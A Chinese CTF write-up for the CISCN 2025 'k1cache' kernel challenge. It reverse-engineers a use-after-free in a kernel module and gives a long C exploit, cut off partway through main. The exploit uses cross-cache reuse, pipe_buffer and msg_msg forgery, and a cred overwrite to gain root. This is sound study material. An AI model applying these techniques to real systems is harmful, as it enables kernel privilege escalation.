CISCN 2025 Final k1cache



目录:



题目名:k1cache

附件:

/ $ uname -a
Linux (none) 6.4.0 #1 SMP PREEMPT_DYNAMIC Mon Sep 18 21:37:46 CST 2023 x86_64 GNU/Linux
#!/bin/sh
qemu-system-x86_64 \
    -m 256M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
    -cpu kvm64,+smep,+smap\
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
    -nographic \
    -no-reboot

用IDA逆向k1cache.ko,可以发现内核模块在kernel_init中创建了设备/dev/klcache以及一个内存池my_struct用来分配32字节的对象,分配标志为SLAB_ACCOUNT | SLAB_PANIC | SLAB_HWCACHE_ALIGN[1]。由于SLAB_ACCOUNT标志的存在,我们的my_struct不会与kmalloc-32合并——但是这不意味着my_struct不会与任何内存池合并。

int __cdecl kernel_init()
{
  _fentry__();
  misc_register(&misc);
  cache = (kmem_cache *)kmem_cache_create("my_struct", 32LL, 0LL, 0x4042000LL, 0LL);
  return 0;
}

我们可以与/dev/klcache交互,在kernel_ioctl函数中定义了三种交互方式——show、add与delete。

/*
 * ioctl handler of the misc device (IDA decompiler output, annotated).
 *
 *   cmd 64  (show)   - copies 24 bytes of arguments from user space, calls show()
 *   cmd 119 (add)    - copies 16 bytes of arguments from user space, calls add_only()
 *   cmd 48  (delete) - copies 8 bytes (the index) and kfree()s addrList[index]
 *
 * Returns 0 for every completed request and for unknown commands, and
 * -22 (-EINVAL) when copy_from_user() reports uncopied bytes.
 *
 * NOTE(review): v3 and v8 are never assigned in this listing; v3 is presumably
 * the third argument `arg` still held in rdx - a decompiler artifact, confirm
 * against the disassembly.
 */
__int64 __fastcall kernel_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
  __int64 v3; // rdx
  __int64 result; // rax
  unsigned __int64 size_low; // r13
  char *v6; // r12
  __int64 v7; // rsi
  __int64 v8; // rdx
  add_args a1; // [rsp+0h] [rbp-38h] BYREF
  unsigned __int64 v10; // [rsp+18h] [rbp-20h]

  _fentry__(file, cmd, arg);
  v10 = __readgsqword(0x28u);
  result = 0LL;
  if ( cmd == 64 )                              // show
  {
    if ( !copy_from_user(&a1, v3, 24LL) )
    {
      // The first qword of the copied arguments is passed where show() declares
      // a pointer; show() only ever uses it as a 32-bit index.
      show((show_args *)a1.size);
      return 0LL;
    }
    return -22LL;
  }
  if ( cmd == 119 )                             // add
  {
    v7 = v3;
    if ( !copy_from_user(&a1, v3, 16LL) )
    {
      // The address of the second qword is handed over, so what add_only()
      // reads as args->size is presumably the user buffer pointer - confirm.
      add_only((add_args *)&a1.buf, v7, v8);
      return 0LL;
    }
    return -22LL;
  }
  if ( cmd != 48 )                              // delete
    return result;
  if ( copy_from_user(&a1, v3, 8LL) )
    return -22LL;
  // The bound is inclusive: index 0x1000 passes this test although the UBSAN
  // checks below treat anything above 0xFFF as out of bounds.
  if ( LODWORD(a1.size) <= 0x1000 )
  {
    size_low = LODWORD(a1.size);
    if ( LODWORD(a1.size) > 0xFFF )
      _ubsan_handle_out_of_bounds(&off_A40, LODWORD(a1.size));
    v6 = addrList[size_low];
    if ( v6 )
    {
      if ( size_low > 0xFFF )
        _ubsan_handle_out_of_bounds(&off_A20, size_low);
      // addrList[size_low] is not cleared after the free, so the stale pointer
      // stays usable by later show and delete requests (UAF / double free).
      kfree(v6);
    }
  }
  return 0LL;
}
/*
 * "add" request (IDA decompiler output, annotated): allocates one object from
 * `cache`, fills it with 32 bytes copied from user space and stores the
 * pointer in the first empty addrList slot.
 *
 * Returns the slot index on success, -12 (-ENOMEM) if the allocation fails,
 * -22 (-EINVAL) if the user copy fails, and 0 if all 4096 slots are occupied.
 * kernel_ioctl() discards this value.
 *
 * NOTE(review): kernel_ioctl() passes &a1.buf as `args`, so the field read
 * here as args->size is presumably the user buffer pointer - confirm.
 */
__int64 __fastcall add_only(add_args *args)
{
  __int64 v1; // rax
  __int64 v2; // rbx
  __int64 v3; // rax
  unsigned int v4; // r12d
  __int64 v6; // [rsp-8h] [rbp-230h]
  char temp[512]; // [rsp+0h] [rbp-228h] BYREF
  unsigned __int64 v8; // [rsp+200h] [rbp-28h]

  _fentry__();
  v8 = __readgsqword(0x28u);
  v1 = kmem_cache_alloc(cache, 0x400CC0LL);
  if ( v1 )
  {
    v2 = v1;
    v3 = copy_from_user(temp, args->size, 32LL);
    if ( v3 )
    {
      // The freshly allocated object is neither freed nor recorded on this path.
      return (unsigned int)-22;
    }
    else
    {
      // Copy the 32 user-supplied bytes into the object, one qword at a time.
      *(_QWORD *)v2 = *(_QWORD *)temp;
      *(_QWORD *)(v2 + 8) = *(_QWORD *)&temp[8];
      *(_QWORD *)(v2 + 16) = *(_QWORD *)&temp[16];
      *(_QWORD *)(v2 + 24) = *(_QWORD *)&temp[24];
      // v3 is 0 here (successful copy), so the scan for an empty slot starts
      // at index 0 and walks upward.
      while ( 1 )
      {
        v4 = v3;
        if ( (unsigned __int64)(int)v3 > 0xFFF )
        {
          v6 = v3;
          _ubsan_handle_out_of_bounds(&off_A80, (int)v3);
          v3 = v6;
        }
        if ( !addrList[v3] )
          break;
        // Table full: returns 0 without storing the object anywhere.
        if ( ++v3 == 4096 )
          return 0;
      }
      if ( (unsigned __int64)(int)v4 > 0xFFF )
        _ubsan_handle_out_of_bounds(&off_A60, (int)v4);
      addrList[v4] = (char *)v2;
    }
  }
  else
  {
    return (unsigned int)-12;
  }
  return v4;
}
/*
 * "show" request (IDA decompiler output, annotated): copies the first 32 bytes
 * of the object stored in addrList[index] to user space.
 *
 * `args` is not dereferenced; its low 32 bits are used directly as the index.
 * Returns 0 on success, 0xFFFFFFFF when the index is rejected or the slot is
 * empty, and 0xFFFFFFEA (-22 as a 32-bit value) when copy_to_user() fails.
 * Nothing here checks whether the object behind the slot has been freed.
 *
 * NOTE(review): kernel_ioctl() calls this with a single argument; a2 is
 * presumably a leftover register pointing at the user buffer field of the
 * copied arguments - confirm against the disassembly.
 */
__int64 __fastcall show(show_args *args, __int64 *a2)
{
  char *v2; // rbx
  __int64 v3; // rdi
  char buf[4096]; // [rsp+0h] [rbp-1028h] BYREF
  unsigned __int64 v6; // [rsp+1000h] [rbp-28h]

  _fentry__();
  v6 = __readgsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  // Inclusive bound: index 0x1000 is accepted although the UBSAN checks below
  // treat anything above 0xFFF as out of bounds.
  if ( (unsigned int)args > 0x1000 )
    return 0xFFFFFFFFLL;
  if ( (unsigned int)args > 0xFFF )
    _ubsan_handle_out_of_bounds(&off_B00, (unsigned int)args);
  v2 = addrList[(unsigned int)args];
  if ( !v2 )
    return 0xFFFFFFFFLL;
  if ( (unsigned int)args > 0xFFFuLL )
  {
    _ubsan_handle_out_of_bounds(&off_AE0, (unsigned int)args);
    _ubsan_handle_out_of_bounds(&off_AC0, (unsigned int)args);
    _ubsan_handle_out_of_bounds(&off_AA0, (unsigned int)args);
  }
  // v3 is the user-space destination; the object is staged in the zeroed
  // kernel stack buffer before being copied out.
  v3 = *a2;
  *(_QWORD *)buf = *(_QWORD *)v2;
  *(_QWORD *)&buf[8] = *((_QWORD *)v2 + 1);
  *(_QWORD *)&buf[16] = *((_QWORD *)v2 + 2);
  *(_QWORD *)&buf[24] = *((_QWORD *)v2 + 3);
  return ((__int64 (__fastcall *)(__int64, char *, __int64))copy_to_user)(v3, buf, 32LL) != 0 ? 0xFFFFFFEA : 0;
}
struct add_args // sizeof=0x10
{
    uint64_t size;    // useless
    char *buf;
};

struct del_args // sizeof=0x8
{
    uint64_t idx;
};

struct show_args // sizeof=0x18
{
    uint64_t idx;
    uint64_t size;    // useless
    char *buf;
};

addrList中可以存放4096个从my_struct中分配的对象。

add:从my_struct中分配并用指定的数据填充对象,分配标志为___GFP_ACCOUNT | ___GFP_DIRECT_RECLAIM | ___GFP_KSWAPD_RECLAIM | ___GFP_IO | ___GFP_FS,也即GFP_KERNEL_ACCOUNT[2]

show:读取addrList中任何已存在对象的32字节内容。

delete:释放addrList中任何已存在的对象,不清空指针。


由于delete功能中有一个非常明显的UAF漏洞,因此我们很容易想到下面的做法。

首先我们要解决的问题是如何让从my_struct内存池中分配的object、slab被其他内存池分配到,这需要内核在kfree时进入__unfreeze_partials[3, mm/slub.c:2581],在kmem_cache_node的partial slab数达到cache->min_partial时执行discard_slab将一个全空的slab释放回Buddy System。一般情况下,在其他内存池从Buddy System中分配slab时,会取回前面释放的slab。由于/dev/klcache的UAF漏洞,我们仍然可以通过访问addrList来读取/二次释放这个已经进入其他内存池的slab上的对象。

接下来,分配struct pipe_buffer结构体,让内存池kmalloc-cg-xx(xx待定,CONFIG_MEMCG_KMEM默认开启)取回前面释放的slab,从而让某些struct pipe_buffer结构体(称作“pipe buffer victim”)为我们所控制。我们可以用show读取“pipe buffer victim”上前32字节的数据,通过page、ops成员的值分别泄露线性映射区的基址page_offset_base与内核代码映射的基址kernel_base。

/**
 *	struct pipe_buffer - a linux kernel pipe buffer
 *	@page: the page containing the data for the pipe buffer
 *	@offset: offset of data inside the @page
 *	@len: length of data inside the @page
 *	@ops: operations associated with this buffer. See @pipe_buf_operations.
 *	@flags: pipe buffer flags. See above.
 *	@private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *              page;                 /*     0     8 */
    unsigned int               offset;               /*     8     4 */
    unsigned int               len;                  /*    12     4 */
    const struct pipe_buf_operations  * ops;         /*    16     8 */
    unsigned int               flags;                /*    24     4 */

    /* XXX 4 bytes hole, try to pack */

    long unsigned int          private;              /*    32     8 */

    /* size: 40, cachelines: 1, members: 6 */
    /* sum members: 36, holes: 1, sum holes: 4 */
    /* last cacheline: 40 bytes */
};

在此之后,通过释放addrList上残留的指针,我们可以将“pipe buffer victim”释放回kmalloc-cg-xx。由于freelist的LIFO单链表结构,如果再从该内存池中取出一个对象,并且刚刚被释放的“pipe buffer victim”所在slab为per_cpu_ptr(kmem_cache->cpu_slab, cpu)->slab,那么取出的对象恰好为“pipe buffer victim”。对这个取出的对象进行读写即可控制“pipe buffer victim”的内容。

现在考虑struct msg_msg结构体。它是一条DATALEN_MSG字节以内IPC消息的头部,IPC消息的长度以及除去头部以外的内容都是可控的。通过pipe_fcntl设置管道的缓冲大小时,内核通过kcalloc分配连续的nr_slots = size >> PAGE_SHIFT(2的幂次)个struct pipe_buffer结构体[4, fs/pipe.c:1239,1258]。考虑nr_slots = 4(kmalloc-cg-192),使用msgsnd系统调用发送192 - sizeof(struct msg_msg)字节的IPC消息,我们刚好可以完整地控制第三个与第四个struct pipe_buffer。为了平衡消息队列中消息的数量,我们还需要msgrcv系统调用来脱链与释放一条消息。

/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
	struct pipe_buffer *bufs;
	unsigned int head, tail, mask, n;

	bufs = kcalloc(nr_slots, sizeof(*bufs),
		       GFP_KERNEL_ACCOUNT | __GFP_NOWARN);

    // ...

}

为了跳过前两个struct pipe_buffer,我们可以对管道写入然后读取两页数据让pipe_inode_info->head与pipe_inode_info->tail同时指向第三个缓冲,通过IPC消息篡改第三个缓冲,再对管道读写便可实现对任意页的读写。


最后,我们尝试将当前进程的task_struct->cred与task_struct->real_cred修改为init_cred。为了方便定位,通过prctl系统调用修改task_struct->comm,直接搜索pipe_buffer_victim->page附近的页,查找与task_struct->comm匹配的字符串定位task_struct,最后完成篡改即可将当前进程提权为root权限。

struct task_struct {
        // ...

        const struct cred  *       real_cred;            /*  2896     8 */
        const struct cred  *       cred;                 /*  2904     8 */
        struct key *               cached_requested_key; /*  2912     8 */
        char                       comm[16];             /*  2920    16 */
        
        // ...

        /* size: 13440, cachelines: 210, members: 240 */

        // ...
};

FINAL EXPLOIT

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <sys/shm.h>
#include <sys/xattr.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/stat.h>

#define CMD_ADD    119
#define CMD_DEL    48
#define CMD_SHOW   64

struct add_args // sizeof=0x10
{
    uint64_t size;
    char *buf;
};
struct del_args // sizeof=0x8
{
    uint64_t idx;
};
struct show_args // sizeof=0x18
{
    uint64_t idx;
    uint64_t size;
    char *buf;
};

/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
    // cpu_set_t cpu_set;

    // CPU_ZERO(&cpu_set);
    // CPU_SET(core, &cpu_set);
    // sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    // printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }


#define OBJECT_SIZE 32

#define MODPROBE_PATH 0xffffffff831d8ce0

int dev_fd;

#define KERNEL_BASE_0 (0xffffffff81000000ULL)
#define ANON_PIPE_OPS_OFFSET (0xffffffff82246ec0ULL - KERNEL_BASE_0)
#define INIT_CRED_OFFSET (0xffffffff8308c620ULL - KERNEL_BASE_0)
#define PAGE_OFFSET_BASE_0 (0xffff888000000000ULL)
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;


/* msgrcv options */
#define MSG_NOERROR     010000  /* no error if message is too big */
#define MSG_EXCEPT      020000  /* recv any msg except of specified type.*/
#define MSG_COPY        040000  /* copy (not remove) all queue messages */

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

struct msg_msgseg {
        struct msg_msgseg *        next;                 /*     0     8 */

        /* size: 8, cachelines: 1, members: 1 */
        /* last cacheline: 8 bytes */
};

struct list_head {
        struct list_head *         next;                 /*     0     8 */
        struct list_head *         prev;                 /*     8     8 */

        /* size: 16, cachelines: 1, members: 2 */
        /* last cacheline: 16 bytes */
};

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

/* read start from len to offset, write start from offset */
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

struct seq_file;

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};


/**
 * Print a red "FATAL"-tagged message, wait for a key press and terminate.
 *
 * @param msg        text appended after the tag
 * @param use_errno  non-zero: report through perror() so the errno text of the
 *                   failing call is appended; zero: print the message alone
 *
 * Never returns; exits with EXIT_FAILURE.
 */
void err_exit(char *msg, int use_errno)
{
    /* Capture errno first: the formatting below may overwrite it before
     * perror() gets to read it. */
    int saved_errno = errno;
    char buf[0x600] = {0,};

    /* Bounded formatting: an over-long msg is truncated instead of
     * overflowing the stack buffer. */
    snprintf(buf, sizeof(buf), "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
    if (use_errno) {
        errno = saved_errno;
        perror(buf);
    } else {
        puts(buf);
    }
    /* Pause so the message stays readable before the process exits. */
    getchar();
    exit(EXIT_FAILURE);
}

int get_msg_queue(void)
{
    int res = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (res < 0) {
        err_exit("get_msg_queue", 1);
    }
    return res;
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, void *m_list_next, void *m_list_prev, 
              uint64_t m_type, uint64_t m_ts, void *next, void *security)
{
    msg->m_list.next = m_list_next;
    msg->m_list.prev = m_list_prev;
    msg->m_type = m_type;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = security;
}

struct msgbuf_64 {
    long mtype;
    union {
        char mtext[64];
        size_t mqword[8];
    };
};

struct msgbuf_192 {
    long mtype;
    union {
        char mtext[192];
        size_t mqword[192/8];
    };
};


int dev_add(void* buf) {
    struct add_args req = { 0x20, buf };
    return ioctl(dev_fd, CMD_ADD, &req);
}

int dev_delete(int index) {
    struct del_args req = { index };
    return ioctl(dev_fd, CMD_DEL, &req);
}

int dev_show(int index, void* buf) {
    struct show_args req = { index, 0x20, buf };
    return ioctl(dev_fd, CMD_SHOW, &req);
}

/**
 * Hex-dump OBJECT_SIZE bytes starting at buf, eight bytes per line.
 *
 * Each line shows the byte offset, the 64-bit word, and the printable ASCII
 * rendering of its bytes (non-printable bytes are shown as '.').
 *
 * The bytes are copied into a local word with memcpy instead of reading the
 * buffer through a size_t pointer, so callers may pass a plain char array
 * without alignment or aliasing concerns.
 */
void dump(void *buf) {
    const unsigned char *bytes = (const unsigned char *)buf;
    for (unsigned int off = 0; off < OBJECT_SIZE; off += 8) {
        /* Only copy what is left, in case OBJECT_SIZE is not a multiple of 8. */
        size_t chunk = (OBJECT_SIZE - off) < 8 ? (size_t)(OBJECT_SIZE - off) : 8;
        uint64_t word = 0;
        char ascii[9];

        memcpy(&word, bytes + off, chunk);
        for (int j = 0; j < 8; ++j) {
            uint8_t ch = (uint8_t)(word >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016llx\x1b[0m    /*  \x1b[90;1m%s\x1b[0m  */\n", off, (unsigned long long)word, ascii);
    }
    printf("\n");
}

/**
 * Hex-dump the first n bytes of buf, eight bytes per line.
 *
 * Each line shows the byte offset, the 64-bit word, and the printable ASCII
 * rendering of its bytes (non-printable bytes are shown as '.').
 *
 * @param buf  start of the data; no alignment requirement
 * @param n    number of valid bytes; when n is not a multiple of 8 the last
 *             line is padded with zero bytes rather than reading past buf+n
 */
void dump_n(void *buf, size_t n) {
    const unsigned char *bytes = (const unsigned char *)buf;
    for (size_t off = 0; off < n; off += 8) {
        /* Never touch bytes beyond n: copy only the remaining tail. */
        size_t chunk = (n - off) < 8 ? (n - off) : 8;
        uint64_t word = 0;
        char ascii[9];

        memcpy(&word, bytes + off, chunk);
        for (int j = 0; j < 8; ++j) {
            uint8_t ch = (uint8_t)(word >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016llx\x1b[0m    /*  \x1b[90;1m%s\x1b[0m  */\n", (unsigned int)off, (unsigned long long)word, ascii);
    }
    printf("\n");
}

/**
 * Read the 32-byte object stored at driver slot idx and hex-dump it.
 *
 * @param idx  slot index passed to the driver's show ioctl
 * @return     the ioctl status returned by dev_show()
 *
 * The buffer is zero-initialised so that a failed ioctl dumps zeros instead of
 * leftover stack contents, and it is declared as size_t words because dump()
 * reads it word by word.
 */
long show_and_dump(size_t idx) {
#ifndef VERBOSE
    printf("Index: \x1b[32;1m%zu\x1b[0m\n", idx);
#endif
    size_t buf[OBJECT_SIZE / sizeof(size_t)] = {0};
    long status = dev_show(idx, buf);
    dump(buf);
    return status;
}


#define NR_PIPES 400
#define NR_SPRAY 4000
#define NR_MSGSND 300

int victim_pipe_i;
int victim_i;
int victim_i_2;
int venomous_msqid;
int pipe_fds[NR_PIPES][2];

size_t orig_ops;

/**
 * Write nbytes from buf into an arbitrary kernel page through the victim pipe.
 *
 * The message that overlaps the victim pipe's buffer array is received and
 * sent again with a forged pipe_buffer, then the pipe is written to.
 *
 * @param page    value for pipe_buffer.page (a kernel `struct page *`)
 * @param offset  byte offset inside that page where the write starts
 * @param buf     user data to write
 * @param nbytes  number of bytes to write
 *
 * Layout: a msg_msg header is 48 bytes and a pipe_buffer is 40 bytes, so the
 * third pipe_buffer (byte 80 of the 192-byte object) sits at mtext[32].
 * Exits through err_exit() if the message round-trip or the pipe write fails.
 */
void arb_write(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
    struct msgbuf_192 dummy_buf;
    if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("read_msg", 1);
    }
    memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
    struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
    
    fake_pipe->page = page;
    fake_pipe->offset = offset;
    /* len 0: the buffer looks empty, so new data lands at `offset`. */
    fake_pipe->len = 0;
    fake_pipe->ops = (void*)orig_ops;
    /* NOTE(review): 0x10 is presumably PIPE_BUF_FLAG_CAN_MERGE, which lets the
     * write append into this buffer - confirm against pipe_fs_i.h. */
    fake_pipe->flags = 0x10;
    
    if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("write_msg", 1);
    }
    
    /* A failed write means the target page was not modified; stop instead of
     * letting the caller continue as if it had been. */
    if (write(pipe_fds[victim_pipe_i][1], buf, nbytes) < 0) {
        err_exit("arb_write: write", 1);
    }
}

/**
 * Read nbytes from an arbitrary kernel page into buf through the victim pipe.
 *
 * The message that overlaps the victim pipe's buffer array is received and
 * sent again with a forged pipe_buffer, then the pipe is read from.
 *
 * @param page    value for pipe_buffer.page (a kernel `struct page *`)
 * @param offset  byte offset inside that page where the read starts
 * @param buf     destination for the data
 * @param nbytes  number of bytes to read
 *
 * Layout: a msg_msg header is 48 bytes and a pipe_buffer is 40 bytes, so the
 * third pipe_buffer (byte 80 of the 192-byte object) sits at mtext[32].
 * Exits through err_exit() if the message round-trip or the pipe read fails.
 */
void arb_read(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
    struct msgbuf_192 dummy_buf;
    if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("read_msg", 1);
    }
    memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
    struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
    
    fake_pipe->page = page;
    fake_pipe->offset = offset;
    /* A non-zero len makes the buffer look filled so read() copies out of
     * `page`. NOTE(review): 0x2000 is presumably just "more than any single
     * read here", so the buffer is never fully drained - confirm. */
    fake_pipe->len = 0x2000;
    fake_pipe->ops = (void*)orig_ops;
    fake_pipe->flags = 0;
    
    if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("write_msg", 1);
    }

    /* On failure buf would still hold whatever the previous call left there;
     * stop rather than let the caller scan stale data. */
    if (read(pipe_fds[victim_pipe_i][0], buf, nbytes) < 0) {
        err_exit("arb_read: read", 1);
    }
}

/**
 * Cross-cache exploit driver.
 *
 * Stages:
 *   1. Create NR_PIPES pipes, tagging pipe i with i+1 buffered bytes.
 *   2. Fill and free NR_SPRAY driver objects; the driver keeps the stale
 *      pointers, so the freed memory stays readable and freeable by index.
 *   3. Resize every pipe to 4 slots so the pipe_buffer arrays reuse that
 *      memory, then locate a stale slot showing a pipe_buffer (page + ops).
 *   4. Advance each pipe so its third buffer is the live one and locate the
 *      stale slot that overlaps that third buffer.
 *   5. Free the victim array through the driver and reclaim it with messages,
 *      giving control over the third and fourth pipe_buffer.
 *   6. Scan pages near the leaked page for this task's comm string, point
 *      cred/real_cred at init_cred and spawn a shell.
 *
 * Returns 0 after the shell exits; every failure goes through err_exit().
 */
int main(){

    dev_fd = open("/dev/klcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("Error opening /dev/klcache", 1);
    }

    size_t tmpbuf[4] = {0,};
    char pagebuf2[0x2000] = {0,};

    /* Stage 1: pipe i holds i+1 bytes, so pipe_buffer.len identifies the pipe. */
    for (int i=0; i<NR_PIPES; ++i) {
        if (pipe(pipe_fds[i]) < 0) {
            err_exit("pipe", 1);
        }
        if (write(pipe_fds[i][1], pagebuf2, i+1) < 0) {
            err_exit("pipe tag write", 1);
        }
    }

    /* Stage 2: allocate and free the driver objects; the pointers dangle. */
    for (int i=0; i<NR_SPRAY; ++i) {
        if (dev_add(&tmpbuf) < 0) {
            err_exit("Failed to add.", 0);
        }
    }

    for (int i=0; i<NR_SPRAY; ++i) {
        dev_delete(i);
    }

    /* Stage 3: 0x4000 bytes = 4 slots = 4 * 40 bytes of pipe_buffer each. */
    for (int i=0; i<NR_PIPES; ++i) {
        if (fcntl(pipe_fds[i][0], F_SETPIPE_SZ, 0x4000) < 0) {
            err_exit("Failed to realloc pipe_buffer", 1);
        }
    }

    /* A slot that now shows a page pointer in word 0 and an ops pointer in
     * word 2 overlaps the first pipe_buffer of some pipe. Zero-initialised so
     * a failed show never compares leftover stack data. */
    size_t orig_buf[4] = {0,};
    for (victim_i=0; victim_i<NR_SPRAY; ++victim_i) {
        dev_show(victim_i, &orig_buf);
        if (orig_buf[0] > PAGE_OFFSET_BASE_0 && orig_buf[2] > KERNEL_BASE_0) {
            break;
        }
    }
    if (victim_i == NR_SPRAY) {
        err_exit("Exhausted.", 0);
    }

    show_and_dump(victim_i);

    /* Stage 4: write two pages in total and read two pages back, leaving
     * i+1 bytes queued in the third buffer of pipe i. */
    for (int i=0; i<NR_PIPES; ++i) {
        if (write(pipe_fds[i][1], pagebuf2, 0x1fff-i) < 0 ||
            write(pipe_fds[i][1], pagebuf2, i+1) < 0 ||
            read(pipe_fds[i][0], pagebuf2, 0x2000) < 0) {
            err_exit("pipe ring advance", 1);
        }
    }

    show_and_dump(victim_i);

    /* The 32-byte slot covering bytes 64..95 of the array ends with the third
     * pipe_buffer's page (word 2) and offset/len (word 3); its len tag must
     * match the one leaked from the first buffer of the same pipe. */
    size_t orig_buf_2[4] = {0,};
    for (victim_i_2=0; victim_i_2<NR_SPRAY; ++victim_i_2) {
        dev_show(victim_i_2, &orig_buf_2);
        if (orig_buf_2[2] > PAGE_OFFSET_BASE_0 && orig_buf_2[3] == orig_buf[1]) {
            break;
        }
    }
    if (victim_i_2 == NR_SPRAY) {
        err_exit("Exhausted _.", 0);
    }

    show_and_dump(victim_i_2);

    page_offset_base = orig_buf[0] & ~0xFFFFFFULL;
    kernel_base = orig_buf[2] - ANON_PIPE_OPS_OFFSET;

    printf("[\x1b[32;1m+\x1b[0m] page_offset_base = 0x%016lx\n", page_offset_base);
    printf("[\x1b[32;1m+\x1b[0m] kernel_base = 0x%016lx\n", kernel_base);

    /* The upper half of word 1 is pipe_buffer.len, i.e. the i+1 tag. */
    victim_pipe_i = (int)(orig_buf[1] >> 32) - 1;
    printf("[\x1b[32;1m+\x1b[0m] victim_pipe_i = %d\n", victim_pipe_i);
    /* The value indexes pipe_fds[] later on; reject anything outside it. */
    if (victim_pipe_i < 0 || victim_pipe_i >= NR_PIPES) {
        err_exit("victim_pipe_i out of range.", 0);
    }

    /* Stage 5: free the victim array and reclaim it with 192-byte messages. */
    venomous_msqid = get_msg_queue();
    struct msgbuf_192 venomous_msgbuf;
    memset(&venomous_msgbuf, 0, sizeof(venomous_msgbuf));
    venomous_msgbuf.mqword[4] = 0x1919810;

    dev_delete(victim_i);

    /* Once a message occupies the object, word 1 of the stale slot is
     * msg_msg.m_list.prev, a kernel pointer. */
    size_t tampered_victim_buf[4] = {0,};
    int reclaimed = 0;
    for (int i=0; i<NR_MSGSND; ++i) {
        if (write_msg(venomous_msqid, (struct msgbuf*)&venomous_msgbuf, 192-sizeof(struct msg_msg), 0x41) < 0) {
            err_exit("write_msg", 1);
        }
        dev_show(victim_i, &tampered_victim_buf);
        if (tampered_victim_buf[1] > PAGE_OFFSET_BASE_0) {
            printf("[\x1b[34;1m*\x1b[0m] %d\n", i);
            reclaimed = 1;
            break;
        }
    }
    if (!reclaimed) {
        err_exit("Exhausted 3.", 0);
    }

    show_and_dump(victim_i);
    show_and_dump(victim_i_2);

    orig_ops = orig_buf[2];

    /* Stage 6: give the task a recognisable comm and search for it. */
    if (prctl(PR_SET_NAME, "astra_kernel") < 0) {
        err_exit("PR_SET_NAME", 1);
    }

    size_t arb_read_buf[512] = {0,};
    size_t curr_page;
    size_t *task_comm = NULL;
    int scanned = 0;
    /* NOTE(review): the 0x40 step is presumably sizeof(struct page), i.e. one
     * physical page per iteration - confirm for the target kernel. */
